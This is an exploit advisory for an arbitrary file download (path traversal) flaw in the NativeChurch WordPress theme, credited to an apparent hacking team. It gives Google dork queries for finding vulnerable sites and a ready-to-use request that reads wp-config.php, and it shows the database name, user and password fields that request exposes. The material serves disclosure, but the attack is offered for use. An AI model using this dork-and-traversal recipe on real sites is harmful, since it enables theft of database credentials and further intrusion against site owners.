####################################################################

# Exploit Title : WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/02/2019
# Vendor Homepage : themeforest.net
# Software Information Link : 
themeforest.net/item/nativechurch-multi-purpose-wordpress-theme/7082446
# Software Affected Versions : WordPress From 3.9 to 5.0.x 
Compatible with Bootstrap 3.x - bbPress 2.5.x
From WooCommerce 2.1.x To WooCommerce 3.4.x, 
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : [PDF]Sample PDF File inurl:"/wp-content/themes/NativeChurch/"
inurl:''inurl:/wp-content/themes/NativeChurch/download/''
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
NativeChurch is a powerful WordPress Theme designed & developed for Church, 

Charity, Non-Profit and Religious Websites and comes handy 

for Portfolio/Corporate Websites as well.

####################################################################

# Impact :
***********
* The NativeChurch theme for WordPress is prone to a vulnerability that lets attackers 

download arbitrary files because the application fails to sufficiently sanitize user-supplied input. 

An attacker can exploit this issue to download arbitrary files within the context 

of the web server process. Information obtained may aid in further attacks.

Attackers can use a browser to exploit this issue. 

* The software uses external input to construct a pathname that should be within a 

restricted directory, but it does not properly neutralize sequences 

such as ".." that can resolve to a location that is outside of that directory.

####################################################################

# Arbitrary File Download Exploit :
******************************
/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php

# Example Informations about MySQL WordPress Configuration File :
***********************************************************
/** Nom de la base de donnees de WordPress. */
define('DB_NAME', 

/** Utilisateur de la base de donnees MySQL. */
define('DB_USER', 

/** Mot de passe de la base de donnees MySQL. */
define('DB_PASSWORD', 

/** Adresse de l'hebergement MySQL. */
define('DB_HOST', 

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################